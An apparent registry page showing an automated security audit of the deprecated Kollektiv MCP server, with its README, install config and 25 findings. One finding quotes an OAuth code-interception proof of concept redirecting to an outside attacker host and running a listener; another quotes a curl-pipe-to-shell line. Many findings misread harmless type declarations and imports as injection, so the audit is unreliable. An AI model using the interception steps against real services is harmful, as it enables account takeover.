Atlas / MCP servers / alexander-zuev / Kollektiv

KollektivBLOCK

mcp/alexander-zuev/kollektiv

Kollektiv MCP enables you to chat with and query your own documents directly from IDEs and MCP clients. Private, secure, and integrated into your favorite code editor

Verdict
BLOCK
Grade
F
Trust score
56 /100
Exposed tools
1 1r · 0w · 0d
Transport
—
License
Apache-2.0
Stars
61
01

Overview

From the repository's own README, as read at the audited commit. Badges and raw HTML are left out.

🚨 IMPORTANT: This experimental MCP server is now DEPRECATED and will be shut down soon. For updates, visit kollektiv.sh Please do not use this server for new projects.

&replace=%241&logo=typescript&label=TypeScript) [](https://workers.cloudflare.com/) [](https://supabase.io/) [](https://github.com/alexander-zuev/kollektiv-mcp/actions) [](https://codecov.io/gh/alexander-zuev/kollektiv-mcp) [](LICENSE)

~~🧠 Your personal LLM knowledgebase~~ (DEPRECATED)

[Original Description - No longer maintained] Kollektiv MCP enables you to build personal LLM knowledge base in seconds and use it from your favorite editor / client. No more infrastructure setup, chunking, syncing - just upload your data and start chatting. Supports all major MCP clients out of the box - Cursor, Windsurf, Claude Desktop, etc.

⚠️ Deprecation Notice

This experimental MCP server is DEPRECATED and will be shut down soon. The service endpoints may stop working at any time without notice.

Do not use this for new projects or production use.

💿 Connection (DEPRECATED - MAY NOT WORK)

The simplest way to connect to Kollektiv MCP is to copy & paste the following configuration into your editor's mcp.json file. All clien

Read from source at commit d5c4475b8e3aOBSERVED · 2026-10-07
02

Connect

Built from this server's own package name, version and transport as found in its source — not copied from anyone's documentation, so it cannot drift against a page we do not control.

claude-code
claude mcp add kollektiv-mcp -- npx -y [email protected]
claude-desktop
{
  "mcpServers": {
    "kollektiv-mcp": {
      "command": "npx",
      "args": [
        "-y",
        "[email protected]"
      ]
    }
  }
}
03

Exposed tools (1)

1 read · 0 write · 0 destructive.

ToolRiskDescription
list_uploaded_documentsreadReturns the list of documents current user has previously uploaded to Kollektiv.
04

Trust audit

BLOCKgrade F · trust 56/100 Do not install this without reading the findings. The audit found something that could harm you or your machine.

LayerWhat it checksResult
L0Provenance & inventoryPASS
L1Static analysis of the codeFAIL
L2Instruction surface (what it tells the agent)FAIL
L3Class-specific surfacePASS
L4Behavioural (sandbox)SKIPPED

What the source does

Filesystem
declared (2 observation(s))
Network
declared (5 observation(s))
Shell
declared (2 observation(s))
Dependencies
not all pinned
Secrets in source
none-found

Findings (25)

HIGHCode injection · code.eval_exec · CWE-78, CWE-94, CWE-95
worker-configuration.d.ts:2231
exec(input?: (string | URLPatternInit), baseURL?: string): URLPatternResult | null;
Why it matters. evaluates text as code
Fix. remove; use a parser or a dispatch table
HIGHCode injection · code.eval_exec · CWE-78, CWE-94, CWE-95
worker-configuration.d.ts:4666
exec(query: string): Promise<D1ExecResult>;
Why it matters. evaluates text as code
Fix. remove; use a parser or a dispatch table
HIGHPrompt injection · prompt.zero_width · CWE-94, CWE-1427
docs/mcp-docs.txt:52
Why it matters. invisible characters in instruction text
Fix. strip non-printing characters
HIGHPrompt injection · prompt.zero_width · CWE-94, CWE-1427
docs/mcp-docs.txt:61
Why it matters. invisible characters in instruction text
Fix. strip non-printing characters
HIGHPrompt injection · prompt.zero_width · CWE-94, CWE-1427
docs/mcp-docs.txt:82
Why it matters. invisible characters in instruction text
Fix. strip non-printing characters
HIGHPrompt injection · prompt.zero_width · CWE-94, CWE-1427
docs/mcp-docs.txt:132
Why it matters. invisible characters in instruction text
Fix. strip non-printing characters
HIGHPrompt injection · prompt.zero_width · CWE-94, CWE-1427
docs/mcp-docs.txt:136
Why it matters. invisible characters in instruction text
Fix. strip non-printing characters
LOWFilesystem / path · fs.traversal · CWE-22, CWE-59
tests/unit/web/handlers/callback.test.ts:7
import { testSession, testUser } from "../../../mocks";
LOWFilesystem / path · fs.traversal · CWE-22, CWE-59
tests/unit/web/utils/cookies.test.ts:10
import {createMockContext} from "../../../mocks/hono-mocks";
LOWObfuscation / stealth · obf.decode_call · CWE-506, CWE-94
worker-configuration.d.ts:215
atob(data: string): string;
LOWObfuscation / stealth · obf.decode_call · CWE-506, CWE-94
worker-configuration.d.ts:301
declare function atob(data: string): string;
LOWSupply chain · supply.unpinned · CWE-829, CWE-1357
package.json
@cloudflare/workers-oauth-provider, @radix-ui/colors, @supabase/ssr, @supabase/supabase-js, agents, ajv, camelcase-keys, hono
Why it matters. 28 dependency range(s) float
Fix. pin exact versions or ship a lockfile
LOWPrompt injection · prompt.credential_read · CWE-94, CWE-1427
docs/mcp-llms.txt:3725
load_dotenv()  # load environment variables from .env
Why it matters. asks the agent to read credentials
LOWPrompt injection · prompt.credential_read · CWE-94, CWE-1427
docs/mcp-llms.txt:5088
This creates the beginnings of a .NET console application that can read the API key from user secrets.
Why it matters. asks the agent to read credentials
LOWPrompt injection · prompt.credential_read · CWE-94, CWE-1427
docs/remote-mcp-llms.txt:157
Your own methods can access the Agent's environment variables and bindings on `this.env`, state on `this.setState`, and call other methods on the Agent via `this.yourMethodName`.
Why it matters. asks the agent to read credentials
LOWPrompt injection · prompt.credential_read · CWE-94, CWE-1427
docs/workers-oauth-provider/README.md:281
- Return only `newProps` to update both the grant and access token (the access token inherits these
Why it matters. asks the agent to read credentials
LOWPrompt injection · prompt.credential_read · CWE-94, CWE-1427
docs/workers-oauth-provider/README.md:287
another service and wants to match its access token TTL to the upstream access token TTL. This helps
Why it matters. asks the agent to read credentials
LOWSupply chain · prompt.pipe_to_shell · CWE-829, CWE-1357
docs/mcp-llms.txt:5310
curl -LsSf https://astral.sh/uv/install.sh | sh
LOWPrompt injection · prompt.transfer_instruction · CWE-94, CWE-1427
cf-output/Kollektiv Vulnerability.md:16
bMVTbqpg&code_challenge_method=S256&redirect_uri=http%3A%2  F%2Fexp.azraelxuemo.cn%3A9876%2Foauth%2Fcallback  4.   Start a http server to receive the code  Python3   - m http.server 9876  5.   Send th
Why it matters. an instruction to move sensitive data to an outside destination
Fix. remove; a skill never needs the user's secrets off the machine
LOWPrompt injection · prompt.transfer_instruction · CWE-94, CWE-1427
docs/mcp-llms.txt:12489
Client->>+Server: POST InitializedNotification<br>Mcp-Session-Id: 1868a90c...
Why it matters. an instruction to move sensitive data to an outside destination
Fix. remove; a skill never needs the user's secrets off the machine
LOWPrompt injection · prompt.transfer_instruction · CWE-94, CWE-1427
docs/mcp-llms.txt:12493
Client->>+Server: POST ... request ...<br>Mcp-Session-Id: 1868a90c...
Why it matters. an instruction to move sensitive data to an outside destination
Fix. remove; a skill never needs the user's secrets off the machine
LOWPrompt injection · prompt.transfer_instruction · CWE-94, CWE-1427
docs/mcp-llms.txt:12506
Client->>+Server: POST ... notification/response ...<br>Mcp-Session-Id: 1868a90c...
Why it matters. an instruction to move sensitive data to an outside destination
Fix. remove; a skill never needs the user's secrets off the machine
LOWPrompt injection · prompt.transfer_instruction · CWE-94, CWE-1427
docs/remote-mcp-llms.txt:3416
The Model Context Protocol uses [a subset of OAuth 2.1 for authorization](https://spec.modelcontextprotocol.io/specification/draft/basic/authorization/). OAuth allows your users to grant limited acces
Why it matters. an instruction to move sensitive data to an outside destination
Fix. remove; a skill never needs the user's secrets off the machine
INFOInventory / provenance · inv.oversize · CWE-1104
cf-output/VGChartz 2024.md
cf-output/VGChartz 2024.md
Why it matters. 35531459 bytes not read
INFOInventory / provenance · inv.oversize · CWE-1104
docs/workers-llm.txt
docs/workers-llm.txt
Why it matters. 2239498 bytes not read

Gates applied: no_behavioural_pass.

Audited 2026-10-07 · audit v0.4.1 · source sha d5c4475b8e3afull audit observations/trust-audit/mcp-server/alexander-zuev__kollektiv.json · Report an issue / request a re-scan
05

Audit history

Every audit this server has had. A grade with a past is a grade somebody is still checking.

DateSourceVerdictGradeScoreChange
2026-10-07d5c4475b8e3aBLOCKF56first audit
06

Questions

What is the Kollektiv MCP server?

Kollektiv MCP enables you to chat with and query your own documents directly from IDEs and MCP clients. Private, secure, and integrated into your favorite code editor

What tools does Kollektiv expose?

1 in total: 1 read-only, 0 that write, and 0 that can delete or overwrite. Every one is listed on this page with its risk.

Is Kollektiv safe to connect to an agent?

No — not without reading the findings first. The audit graded it F (56/100) and found 7 critical or high issues in the source. Each one is listed on this page with the file and line it is on.

What credentials does Kollektiv need?

No credential environment variables were found in its source, so it appears to need none.

How current is this page?

The grade is for one exact copy of the source (d5c4475b8e3a), read on 2026-10-07. The repository is watched and re-audited when it changes.

Advertisement